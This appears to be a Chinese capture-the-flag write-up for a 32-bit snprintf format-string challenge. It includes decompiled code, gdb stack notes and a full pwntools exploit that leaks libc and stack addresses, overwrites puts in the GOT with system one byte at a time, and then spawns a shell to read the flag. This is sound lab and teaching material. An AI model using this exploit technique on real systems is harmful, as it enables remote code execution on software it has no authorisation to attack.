格式化字符串漏洞 snprintf
程序先读入字符串,再用snprintf输出;由于snprintf有长度限制,每次只能一位一位地改。
// Decompiler output (IDA-style) for the routine that copies the decoded input
// into a global. `s` (the input buffer) and `byte_804A8A0` (the destination,
// passed with a 0x800 bound) are defined elsewhere in the binary. The exploit
// below base64-encodes everything it sends, so sub_804869D is presumably the
// base64 decoder — confirm in the binary.
int sub_8048B76()
{
size_t v0; // eax
const char *v1; // eax
v0 = strlen(s);
v1 = (const char *)sub_804869D(s, v0, 0);
// "%s" is a literal here, so this call is not the format-string sink; the
// gdb dump later shows byte_804A8A0 holding the user's "%29$x,..." string,
// so presumably a later call formats that global directly. The 0x800 bound
// only caps how much of the decoded input lands in it (the writeup's reason
// for writing one byte at a time with %hhn). The later GOT overwrite implies
// got.puts is writable (not full RELRO) — confirm with checksec.
return snprintf(byte_804A8A0, 0x800u, "%s", v1);
}
思路:
- 先通过偏移打印出各部分加载地址
- 利用argv的ebp链在后部写入got.puts的地址及+1、+2、+3(argv的偏移是不固定的,需要在泄露地址后计算)
- 一次(4字节)写为system
- 发送/bin/sh
完成后看别人的exp,发现这道题栈可执行,可以直接把ebp+4处的返回地址改为输入串的指针(相当于jmp到输入串)来执行shellcode;输入时先放shellcode,后面再写ebp地址和数字。
完整exp:
from pwn import *
from base64 import b64encode
# Target setup: `local` selects a spawned ./pwn or the remote challenge
# instance; the libc is the 2.23 i386 build named in its path.
local = 1
if local == 1:
    p = process('./pwn')
else:
    p = remote('111.200.241.244', 63770)
libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_i386/libc-2.23-i386-0ubuntu11.so')
# Presumably one_gadget offsets for this libc; not used anywhere below.
one = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
# Offset of __libc_start_main+247 (the return address leaked via slot #29
# in the dump below) from the libc load base.
offset_main_ret = 0x18637
elf = ELF('./pwn')
context(arch='i386', log_level='debug')
# gdb stack dump taken at the format call; the trailing "#N" is the
# positional format-argument index (%N$) of that stack slot.
'''
0000| 0xfff41e70 --> 0x804a8a0 ("%29$x,%12$x,%9$x,") #6
0012| 0xfff41e7c --> 0x83b0008 ("%29$x,%12$x,%9$x,") #9
0024| 0xfff41e88 --> 0xfff41ea8 --> 0xfff41ec8 --> 0x0 #12
0092| 0xfff41ecc --> 0xf7d7c637 (<__libc_start_main+247>: add esp,0x10) #29
0100| 0xfff41ed4 --> 0xfff41f64 --> 0xfff4240b ("./pwn") #31->69->792:xxx400
0104| 0xfff41ed8 --> 0xfff41f6c --> 0xfff42411 ("SHELL=/bin/bash") #32->71
'''
def add(msg):
    """Send one line to the target process.

    The target appears to base64-decode its input (see sub_804869D above),
    so *msg* is encoded before it is written.

    Args:
        msg: raw bytes to deliver.
    """
    encoded = b64encode(msg)
    p.sendline(encoded)
# Exploit sequence. Order matters: every add() below is answered by a matching
# recv. Indentation of the loop body was reconstructed from the pasted listing.
gdb.attach(p, 'b*0x8048bc0')  # debug hook; the breakpoint only fits the local binary
pause()
# Step 1 - leak. Slots 29/12/9/31 are the entries annotated #29/#12/#9/#31 in
# the gdb dump above (libc return address, a saved stack pointer, a heap
# pointer, the argv pointer).
add(b'%29$x,%12$x,%9$x,%31$x,')
libc_base = int(p.recvuntil(b',', drop=True), 16) - offset_main_ret
libc_elf.address = libc_base
# Per the dump, slot #12 holds a pointer 0x38 above slot #6, so this is the
# address of slot #6.
stack_addr= int(p.recvuntil(b',', drop=True), 16) - 0x38
heap_addr = int(p.recvuntil(b',', drop=True), 16)  # leaked but unused below
print('libc:', hex(libc_base), 'stack#31:', hex(stack_addr))
#31->67->300
stack_67 = int(p.recvuntil(b',', drop=True), 16)
# stack_addr is format argument #6, so (addr - stack_addr)//4 + 6 converts a
# stack address into its %N$ index.
base_off = 6
base_67 = (stack_67 - stack_addr)//4+ base_off
print('#67:', base_67, hex(stack_67))
# Read the pointer stored at stack_67 (the argv[0] string pointer) and round
# it down to the 0x100 boundary the dump calls "xxx400".
add(f'%{base_67}$x,'.encode())
stack_300 = int(p.recvuntil(b',', drop=True), 16) & 0xffffff00
base_300 = (stack_300 - stack_addr)//4+ base_off
print('#300:', base_300, hex(stack_300))
# Step 2 - stage got.puts, got.puts+1, +2, +3 (16 bytes) at stack_300.
# Per round: the first write sets the low byte of the pointer stored at
# stack_67 to i, the second writes vv[i] through that pointer, i.e. to
# stack_300 + i.
vv = p32(elf.got['puts'])+p32(elf.got['puts']+1)+p32(elf.got['puts']+2)+p32(elf.got['puts']+3)
for i in range(16):
    payload = b'A'*i + f'%31$hhn'.encode()
    add(payload)
    payload = f'%{vv[i]}c%{base_67}$hhn,,,'.encode()
    add(payload)
    p.recvuntil(b',,,')  # ',,,' is the per-round sync marker appended above
# Step 3 - write system() over got.puts through the four staged slots, one
# byte per %hhn. Widths are successive differences mod 0x100 because the %n
# counter is cumulative across the format string.
ss = p32(libc_elf.sym['system'])
p0 = ss[0]
p1 = (0x100 + ss[1] - ss[0]) & 0xff
p2 = (0x100 + ss[2] - ss[1]) & 0xff
p3 = (0x100 + ss[3] - ss[2]) & 0xff
print(p0,p1,p2,p3, hex(libc_elf.sym['system']))
payload = f"%{p0}c%{base_300}$hhn%{p1}c%{base_300+1}$hhn%{p2}c%{base_300+2}$hhn%{p3}c%{base_300+3}$hhn;/bin/sh;#".encode()
add(payload)
# With puts now resolving to system, the next input is the command string.
add(b'/bin/sh\x00')
p.sendline(b'cat /flag')
p.interactive()
如果题目难度加大,把栈设置为不可执行,就得回到这个解法了。